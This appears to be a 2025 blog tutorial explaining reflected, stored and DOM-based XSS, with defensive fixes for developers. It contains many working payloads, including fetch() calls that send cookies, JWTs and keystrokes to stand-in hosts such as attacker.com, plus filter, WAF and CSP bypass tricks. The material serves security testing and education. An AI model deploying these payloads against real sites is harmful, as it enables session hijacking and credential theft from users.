
Practical XSS: DOM vs Reflected vs Stored in 2025 (Payloads & Bypasses)

If you hunt bugs, run red teams, or build web apps, XSS still matters in 2025. It is one of the easiest ways to jump from “weird UI bug” to full account takeover, even on big platforms.

Cross-site scripting (XSS) is when an attacker runs their own JavaScript in someone else’s browser using a vulnerable site. The three main flavors are simple to say, hard to defend: reflected XSS (comes back in a single response), stored XSS (saved on the server), and DOM-based XSS (triggered by client-side code).

This guide focuses on real payloads and modern bypass tricks, not just alert(1). You will see how attackers build and adapt payloads for each type, and how filters, CSP, and WAFs can fail in practice. It is written for people who already get basic HTTP and HTML and want to level up their XSS game.


Quick XSS refresher: DOM vs reflected vs stored in simple terms

Close-up of Scrabble tiles spelling 'data breach' on a blurred background
Photo by Markus Winkler

In 2025, XSS is still one of the most common web attacks. Recent reports show it again takes a big share of real traffic, often chained with other flaws like weak session handling or open redirects. A single working XSS can move an attacker from “guest user” to “owning an admin account” in a few steps.

Here is the short refresher.

Reflected XSS means the payload travels with the request, usually in the URL, query string, or a form field. The server reflects that value into the response without proper output encoding. The victim has to load a malicious link, submit a form, or use a poisoned feature. It hits once, in that single response.

Stored XSS means the payload is saved on the server, for example in a comment, profile field, or support ticket. Later, when any user views a page that shows that stored value, the script runs in their browser. This scales very well for attackers and is often rewarded more in bug bounty programs because of the wide impact.

DOM-based XSS happens fully in the browser. Client-side JavaScript takes data from a source, such as location.hash or localStorage, and writes it into a dangerous sink, such as innerHTML or eval, without escaping. The server response can be perfectly safe, yet the client code still turns user-controlled data into script execution. This is especially common in single-page apps and heavy front-end frameworks.

For a deeper reference while reading, you can keep the PortSwigger XSS cheat sheet open as a side tab.

What cross-site scripting (XSS) actually lets an attacker do

Running JavaScript in someone else’s browser means you get to act as that user inside that site.

With a working XSS, an attacker can:

  • Steal cookies or tokens and reuse the victim’s session
  • Read private data that is only visible when the victim is logged in
  • Fake login prompts or support popups to collect passwords or credit card data
  • Log keystrokes in sensitive forms
  • Trigger actions on behalf of the victim, such as changing the email or turning off MFA

Picture a social network where profile comments are vulnerable. An attacker posts a comment that silently sends each viewer’s session token to a remote server. Anyone who scrolls past that comment can lose their account.

Or think about a search page in a corporate dashboard. A reflected XSS in the search parameter can become a phishing link that steals an administrator’s session and opens the door to full system control.

This is why modern XSS guides for bug bounty hunters treat it as more than just “pop an alert.”

How reflected XSS works in real websites

Reflected XSS is about echoing input right back to the user.

Common sources:

  • Query parameters in URLs
  • Form inputs shown again on an error or results page
  • HTTP headers written into responses without escaping

The attacker crafts a URL that includes the payload, sends it to a victim, and waits. When the victim visits that URL, the server returns a page that includes the unescaped input, the browser parses it, and the script runs.

Example: a search page that prints You searched for: <user input> without encoding. The attacker sends:

https://example.com/search?q=<script>alert(1)</script>

Only victims who follow this crafted link will see the payload. Because of this, reflected XSS often needs social engineering, which is why it is usually the first style beginners find and exploit in bug bounty programs.
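To see why output encoding is the fix here, consider a minimal sketch of the vulnerable render step. The escapeHtml helper and both render functions are hypothetical, not code from any real app:

```javascript
// Hypothetical server-side render of the "You searched for" line.
// renderUnsafe reflects the query as-is; renderSafe encodes it first.
function escapeHtml(s) {
  return s
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

function renderUnsafe(q) {
  return 'You searched for: ' + q; // payload reaches the browser as live markup
}

function renderSafe(q) {
  return 'You searched for: ' + escapeHtml(q); // payload becomes inert text
}

const payload = '<script>alert(1)<\/script>';
console.log(renderUnsafe(payload));
console.log(renderSafe(payload)); // You searched for: &lt;script&gt;alert(1)&lt;/script&gt;
```

The same input, encoded at output time, renders on screen as harmless text instead of being parsed as a tag.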

How stored XSS stays on the server and hits many users

Stored XSS is more dangerous because the payload sits “waiting” on the server.

Typical storage points:

  • Blog comments or guestbooks
  • User bios and profile fields
  • Support tickets or admin notes
  • Chat messages or forum posts

When the app displays that stored content without safe output encoding, every user who views it can trigger the payload. One malicious comment on a busy page can hit thousands of users, including admins and staff.

Bug bounty programs often pay more for stored XSS because the blast radius is bigger, the attack does not need a special link, and it is easier to chain into higher impact, such as full account takeover or data theft.

Why DOM-based XSS is harder to spot and block

DOM-based XSS lives inside the browser’s JavaScript runtime.

Client code reads from unsafe sources, such as:

  • location.hash or location.search
  • document.referrer
  • localStorage or sessionStorage
  • window.postMessage data

Then it sinks that data into dangerous APIs like innerHTML, outerHTML, document.write, eval, or setTimeout with a string.

Because the payload may sit in the URL fragment or inside local storage, the server never sees the final malicious string. Traditional scanners and simple WAF rules that only inspect HTTP traffic often miss it.

This style is very common in modern SPAs where front-end code builds the page from dynamic data. Developers trust anything that “comes from our own app,” forget that attackers control the browser too, and skip proper encoding.


Practical XSS payloads: DOM vs reflected vs stored with real 2025 examples

In 2025, attackers still use classic XSS tricks, but combine them with smarter payloads and chains. Public collections like GitHub’s xss-payload-list show how large and creative these payload sets have become.

Here is how payloads look in practice for each type.

Reflected XSS payloads that slip through basic filters

Start with the obvious case:

<script>alert(1)</script>

Many apps now block bare <script> tags. Simple filters may blacklist that word, but forget that event handlers also run JavaScript.

Example using an image tag:

<img src=x onerror=alert(1)>

If the filter strips <script> tags but does not touch attributes like onerror, this still works. Attackers often URL-encode the payload so the link looks harmless:

https://example.com/search?q=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
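You can check what that encoded query turns back into; the percent sequences map straight onto the image payload:

```javascript
// Decoding the query string from the crafted URL above.
const encoded = '%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E';
console.log(decodeURIComponent(encoded)); // <img src=x onerror=alert(1)>
```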

To move from proof of concept to impact, attackers read data such as document.cookie or CSRF tokens inside the page:

<img src=x onerror="fetch('//attacker.com/?c='+document.cookie)">

Filters that look only for the literal word cookie are weak. Attackers can split strings, change case, or concatenate pieces:

<img src=x onerror="fetch('//att.com/?d='+document['coo'+'kie'])">

Or they use link or button handlers:

<a href=# onclick="alert(1)">Click</a>

Even if the app tries to remove script tags, these reflected payloads can still slip through.

Stored XSS payloads that quietly steal data or hijack sessions

Stored XSS payloads usually live in comments, bios, or chat messages. Low-profile payloads are more dangerous than noisy alerts.

Simple cookie exfil in a comment:

<img src=x onerror="this.remove();fetch('//attacker.com/?c='+document.cookie)">

The this.remove() call hides the broken image, so casual users might not see anything wrong.

Attackers also go after localStorage, where many SPAs keep JWTs or session data:

<img src=x onerror="fetch('//att.com/?t='+localStorage.getItem('jwt'))">

Longer-lived payloads can log keystrokes in a form:

<input oninput="fetch('//att.com/k?c='+this.value)">

Or inject a fake login form:

<div id=login>Session expired. Please log in again.</div>

Combined with extra JavaScript attached via onload or onclick, this can steal passwords while users think they are still on the real site.

When stored inside attributes, text, or script blocks, payloads must match the HTML context. An attribute payload must close quotes, plain-text payloads often start with <script> or <img>, and script-block payloads may use </script> breakout tricks. Small context errors break the page, so experienced attackers tailor the payload’s shape to the exact sink.

DOM-based XSS payloads that abuse innerHTML and the URL

A classic DOM XSS case in a SPA:

const hash = location.hash.substring(1);
document.getElementById('message').innerHTML = hash;

If the attacker sends a URL like:

https://example.com/#<img src=x onerror=alert(1)>

The app reads the fragment, writes it into innerHTML, and the image’s onerror runs.
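A hedged fix for this pattern is to treat the fragment as text rather than markup. The sketch below uses a plain object as a stand-in for the DOM element so the data flow is visible outside a browser; in a real page, textContent never triggers HTML parsing:

```javascript
// Safer variant of the snippet above: write untrusted data with textContent.
function setMessage(el, untrusted) {
  el.textContent = untrusted; // the browser renders this as inert text
}

// Minimal stand-in for document.getElementById('message'):
const fakeEl = { textContent: '' };
setMessage(fakeEl, '<img src=x onerror=alert(1)>');
console.log(fakeEl.textContent); // stored as a plain string, never parsed
```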

Another pattern combines multiple sinks to sidestep simple defenses:

const q = new URLSearchParams(location.search).get('q');
document.body.innerHTML = q;
setTimeout(function () { /* later code re-reads the DOM the attacker now controls */ }, 0);

Even if filters strip script tags, they may still let <svg onload=...> or similar elements through:

<svg onload=alert(1)>

Because modern apps glue together many DOM operations, attackers often chain sources and sinks, for example, hash to innerHTML, then innerHTML to another function, until they reach script execution.


Modern XSS bypass tricks: beating filters, CSP, and WAF rules

In 2025, XSS defense is less about one magic setting and more about layers: correct output encoding, smart filters, solid CSP, and aware WAF rules. Attackers answer by mixing encoding, obfuscation, and less obvious event handlers. Recent articles on advanced XSS techniques in 2025 show how creative these evasion tricks can get.

Getting around simple filters and HTML sanitizers

Many sites still apply naive input filters. They remove <script> tags or block keywords like onerror, but leave other dangerous pieces alone.

Attackers respond with:

  • Harmless-looking tags such as img, svg, video, or a
  • Event handlers like onload, onmouseover, onclick, or onfocus
  • Broken words, mixed case, or extra characters

Examples:

<scr<script>ipt>alert(1)</scr</script>ipt>

or

<imG sRc=x oNeRrOr=alert(1)>

Some filters search for exact strings. Browsers are more forgiving and ignore extra whitespace or control characters that filters do not handle.
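The nested-tag payload shown earlier works against any filter that removes matches in a single pass. A sketch of such a hypothetical filter makes the failure obvious: stripping the inner tags reassembles the outer ones:

```javascript
// Sketch of a naive one-pass filter (hypothetical; real sanitizers vary).
function naiveStrip(input) {
  return input.replace(/<script>/gi, '').replace(/<\/script>/gi, '');
}

const nested = '<scr<script>ipt>alert(1)</scr</script>ipt>';
console.log(naiveStrip(nested)); // <script>alert(1)</script>
```

A robust sanitizer parses the markup instead of pattern-matching it, or at minimum strips repeatedly until the output stops changing.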

Context also matters. A sanitizer that escapes HTML characters may still leave dangerous content inside a JavaScript string:

<script>
  var msg = "USER_INPUT_HERE";
</script>

In this case, breaking out of the string and adding your own code is enough, even if < and > are escaped elsewhere.
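A sketch of that failure mode, assuming a hypothetical template that encodes angle brackets but leaves quotes alone:

```javascript
// Hypothetical template: escapes < and > but not quotes.
function renderJsContext(input) {
  const noAngles = input.replace(/</g, '&lt;').replace(/>/g, '&gt;');
  return '<script>var msg = "' + noAngles + '";<\/script>';
}

// No angle brackets needed: the double quote closes the string,
// the semicolon ends the statement, and // comments out the rest.
const breakout = '";alert(1);//';
console.log(renderJsContext(breakout));
```

The payload sails through untouched because it never uses the characters the sanitizer watches for; the context, not the character set, is what matters.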

Bypassing Content Security Policy (CSP) in the real world

Content Security Policy tries to control where scripts come from and how they run. Common goals:

  • Block inline scripts
  • Restrict script sources to a few safe domains
  • Stop the use of eval and similar APIs
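A policy aiming at those goals might look like the following sketch; the sources would need adjusting for each app:

```http
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'; frame-ancestors 'none'
```

Note that without 'unsafe-inline' in script-src, both inline <script> blocks and inline event handlers are refused by default.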

In practice, CSP is often misconfigured. Some apps still allow unsafe-inline or unsafe-eval, which opens the door to simple payloads like:

<button onclick="setTimeout('alert(1)', 0)">Click</button>

If CSP allows scripts from a CDN or a specific API endpoint, attackers might find a way to host or reflect JavaScript from that allowed origin, then load it from their payload.

Old JSONP-style endpoints are another weak spot. If CSP allows https://api.example.com for scripts, and that host has a reflection endpoint, an attacker can turn it into a loader for their own JS.
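With such an endpoint on an allowed host, the loader can be a single tag (hypothetical endpoint and parameter names):

```html
<script src="https://api.example.com/jsonp?callback=alert"></script>
```

The response is attacker-influenced JavaScript served from an origin the policy trusts, so CSP does not block it.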

Even when CSP blocks inline <script> blocks, it may still allow inline event handlers or data: URLs inside attributes, which attackers can abuse for stored or DOM-based XSS.

Evading WAF and security tools with encoding and obfuscation

Web Application Firewalls and scanners often look for obvious strings like <script>, onerror=, or alert(. To avoid these patterns, attackers combine:

  • URL encoding or double encoding
  • HTML entities like &#x3c; for <
  • JavaScript obfuscation, such as String.fromCharCode

Simple example, alert built from char codes:

<script>
  eval(String.fromCharCode(97,108,101,114,116,40,49,41));
</script>
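You can verify what those char codes spell without ever running eval:

```javascript
// Decoding the char codes from the payload above, no eval involved.
const decoded = String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41);
console.log(decoded); // alert(1)
```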

A smart WAF may still catch this, so attackers mix multiple tricks, split strings over attributes, or hide code inside less common tags.

They also try to keep payloads short and natural-looking. An admin reviewing a support ticket is more likely to click through a subtle broken image than a massive block of scrambled text.

For a research view on where detection is heading, the paper on AI-driven XSS detection, GenXSS, is worth reading.


Conclusion: leveling up against DOM, reflected, and stored XSS

DOM, reflected, and stored XSS all come down to the same core idea: untrusted data becomes active JavaScript in the browser. Modern payloads favor attributes, event handlers, and DOM sinks like innerHTML, not only old-school <script> tags. Filters, CSP, and WAFs help, but weak or partial setups can still be bypassed with clever encoding and context-aware payloads.

For developers and testers, a few clear habits go a long way:

  1. Use the right output encoding per context, for HTML, attributes, JavaScript, and URLs.
  2. Avoid unsafe DOM sinks such as innerHTML, eval, and similar APIs, or sanitize data before it reaches them.
  3. Deploy a strong CSP that blocks inline scripts and tightens allowed script sources.
  4. Test with real browsers, modern tools, and up-to-date cheat sheets.
  5. Treat user-supplied HTML as hostile, and review any “rich text” or HTML feature very carefully.

Practice in legal labs or bug bounty platforms, keep your payload skills fresh, and you will stay ahead of both simple XSS bugs and the more advanced chains that define XSS exploitation in 2025.
